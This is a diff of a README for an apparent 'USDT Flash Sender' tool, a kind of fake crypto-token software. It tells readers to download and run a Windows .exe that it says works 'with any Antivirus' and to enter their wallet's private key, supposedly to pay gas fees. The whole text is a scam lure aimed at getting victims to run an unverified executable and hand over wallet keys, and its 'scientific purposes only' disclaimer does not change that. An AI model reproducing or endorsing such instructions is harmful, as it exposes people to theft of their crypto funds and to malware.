ethflasher/ETH-Flasher-USDT/README.md

 🚀 **How to Use USDT Flash Sender:**

 1. **Download**: Securely install the .exe file on your Windows device.
 Made on Python - working with any Antivirus 🔥
 2. **Run**: Access the intuitive, easy-to-use interface.

+⚠️ IMPORTANT⚠️

+Private key (not seed phrase)🔑 is the key to your wallet, which contains the necessary balance of Ether (ETH) 💰 to pay for the gas fees ⛽ of the transaction.
+Delivery address 📬 is the address where you want to send the flash tokens 💸.

-3. **Send USDT**: Enter wallet addresses, specify amounts, and execute instant transactions!
+4. **Send USDT**: Enter wallet addresses, specify amounts, and execute instant transactions!

 ⚠️ **Important Note**: The software is intended for **scientific purposes only**.
 Usage for any illegal activities is strictly prohibited.